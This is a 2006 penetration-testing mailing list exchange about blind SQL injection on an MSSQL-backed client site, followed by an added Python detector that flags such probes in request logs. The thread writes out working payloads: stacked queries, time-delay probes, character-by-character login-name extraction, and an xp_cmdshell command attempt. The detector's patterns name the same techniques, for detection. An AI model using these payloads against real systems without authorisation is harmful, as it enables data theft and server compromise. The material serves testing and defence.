Penetration Testing mailing list archives
Re: Blind SQL Injection Techniques
From: "Leonardo Rodrigues" <leonardo.rsouza () terra com br>
Date: Wed, 13 Dec 2006 18:24:23 -0200
Hi,

Try something like this:

  ;if system_user = char(115)+char(97) waitfor delay '0:0:05';--

But if you really want to determine the connection user, break system_user
with substring() and test each character...

  if (SELECT ASCII(SUBSTRING((a.loginame),1,1)) FROM master..sysprocesses AS a WHERE a.spid = @@SPID) > 76 waitfor delay '00:00:05';--

A tool like absinthe (0x90.org) would help you.

[]'s
Leo

----- Original Message -----
From: <One2 () onetwo com>
To: <pen-test () securityfocus com>
Sent: Wednesday, December 13, 2006 5:41 AM
Subject: Blind SQL Injection Techniques
Hi All,

I am testing a client at the moment who has a Blind SQL Injection
vulnerability and am running out of techniques, so need some tips.

I injected the following string to validate that the system has an MSSQL
server at the back-end.

  or 1=1;select * from sysobjects;--

This returned a valid page. Also injected the following and got a valid
page, but again no data since it is completely blind.

  or 1=1;select @@version;--

Replacing sysobjects, in the first example, with an invalid table returns
a custom error page that doesn't disclose anything.

It seems that when injecting any invalid sql statement I get the same
custom error page coming back that doesn't reveal any information.

My next step was to determine whether the DB was running as system. I
tried using the following command:

  or 1=1;if (select user) = 'sa' waitfor delay '0:0:5';--

... but got the error page, indicating that it didn't work - especially
since it didn't take 5 seconds. I then tried simplifying it to just:

  waitfor delay '0:0:5';--

... but again, the error page, indicating this command was not working. I
thought it was the quotes but the following were successful:

  or 1=1;select * from 'sysobjects';--
  or 1=1;select * from "sysobjects";--

I then tried the following to see if I could actually run system commands:

  or 1=1;exec master..xp_cmdshell dir;--

... but this got the error page again indicating unsuccessful.

Any suggestions on gaining further information or access on this system
would be appreciated.

Thanks,
One2

------------------------------------------------------------------------
This List Sponsored by: Cenzic

Need to secure your web apps? Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
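The thread above turns on two observable side effects of a blind probe: a stacked statement with a T-SQL "waitfor delay", and a response that takes about as long as the requested delay. Both are visible to the defender in a web server log that records request latency. The following is an added example, not code from the thread or from any tool it mentions: a small Python detector that parses a constructed request log (the format and every line are made up for this illustration), flags the query-string patterns seen in the thread (stacked queries, waitfor delay, char()-encoded literals, ascii(substring()) character probes, MSSQL built-ins), and marks a flagged request as a time anomaly when its latency is far above the median of clean requests to the same path.

```python
"""Detect blind / time-based SQL injection probes in a web request log.

Added example; not code from the mailing-list thread. The log format, the
field layout and every sample line below are constructed for this
illustration and are not real traffic.
"""
import re
import statistics
from dataclasses import dataclass, field
from typing import Dict, List
from urllib.parse import unquote_plus, urlsplit

# Constructed sample log, one request per line:
#   <timestamp> <client-ip> <method> <path?query> <status> <duration-ms>
# The injected query strings mirror the shapes discussed in the thread.
SAMPLE_LOG = """\
2006-12-13T10:41:00Z 10.0.0.5 GET /products.asp?id=12 200 40
2006-12-13T10:41:01Z 10.0.0.7 GET /search.asp?q=delay+in+shipping 200 55
2006-12-13T10:41:02Z 10.0.0.5 GET /products.asp?id=12%20or%201%3D1%3Bselect%20%40%40version%3B-- 200 42
2006-12-13T10:41:05Z 10.0.0.5 GET /products.asp?id=12%3Bif%20system_user%3D%27sa%27%20waitfor%20delay%20%270%3A0%3A5%27%3B-- 200 5031
2006-12-13T10:41:06Z 10.0.0.9 GET /products.asp?id=13 200 38
2006-12-13T10:41:12Z 10.0.0.5 GET /products.asp?id=12%3Bif%20(SELECT%20ASCII(SUBSTRING((a.loginame)%2C1%2C1))%20FROM%20master..sysprocesses%20AS%20a%20WHERE%20a.spid%3D%40%40SPID)%3E76%20waitfor%20delay%20%2700%3A00%3A05%27%3B-- 200 5020
"""

# Indicator patterns, matched case-insensitively against the decoded query string.
INDICATORS: Dict[str, re.Pattern] = {
    # T-SQL delay primitive used by time-based blind probes
    "time_delay": re.compile(r"\bwaitfor\s+delay\b", re.I),
    # statement separator followed by a second statement (stacked queries)
    "stacked_query": re.compile(
        r";\s*(?:select|if|exec|declare|waitfor|insert|update|delete)\b", re.I),
    # trailing comment that discards the remainder of the original query
    "comment_terminator": re.compile(r"--\s*$"),
    # char(nn) concatenation used to avoid literal quote characters
    "char_encoding": re.compile(r"\bchar\s*\(\s*\d+\s*\)", re.I),
    # one-character-at-a-time extraction: ascii(substring(...))
    "char_probe": re.compile(r"\bascii\s*\(\s*substring\s*\(", re.I),
    # MSSQL system objects and built-ins that fingerprint the back-end
    "mssql_builtin": re.compile(
        r"(?<!\w)(?:sysobjects|sysprocesses|@@version|@@spid|system_user|xp_cmdshell)(?!\w)", re.I),
    # classic always-true predicate
    "tautology": re.compile(r"\bor\s+1\s*=\s*1\b", re.I),
}


@dataclass
class Request:
    ts: str
    ip: str
    method: str
    path: str
    query: str            # URL-decoded query string
    status: int
    duration_ms: int
    indicators: List[str] = field(default_factory=list)


def parse_log_line(line: str) -> Request:
    """Split one constructed-format log line into a Request."""
    ts, ip, method, target, status, duration = line.split()
    parts = urlsplit(target)
    return Request(ts, ip, method, parts.path, unquote_plus(parts.query),
                   int(status), int(duration))


def classify(req: Request) -> List[str]:
    """Record which injection indicators fire on the request's query string."""
    req.indicators = [name for name, rx in INDICATORS.items() if rx.search(req.query)]
    return req.indicators


def detect(log_text: str, slow_factor: float = 5.0) -> List[Request]:
    """Return flagged requests; flagged ones that are also slow get 'time_anomaly'.

    The latency baseline is the median duration of requests to the same path
    that carry no indicators, so a slow legitimate endpoint is not mistaken
    for a delay probe.
    """
    reqs = [parse_log_line(l) for l in log_text.splitlines() if l.strip()]
    for r in reqs:
        classify(r)
    clean: Dict[str, List[int]] = {}
    for r in reqs:
        if not r.indicators:
            clean.setdefault(r.path, []).append(r.duration_ms)
    baseline = {p: statistics.median(v) for p, v in clean.items()}
    for r in reqs:
        base = baseline.get(r.path)
        if r.indicators and base is not None and r.duration_ms >= slow_factor * base:
            r.indicators.append("time_anomaly")
    return [r for r in reqs if r.indicators]


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"{f.ts} {f.ip} {f.path} {f.duration_ms}ms {f.indicators}")
```

The latency check only annotates requests that already carry a syntactic indicator; a slow request on its own is a performance signal, not evidence of injection, and using it alone would flag every slow legitimate page. The benign "delay in shipping" search does not fire because the delay pattern requires the "waitfor" keyword, which is the kind of precision worth keeping when these patterns feed an alert rather than a report.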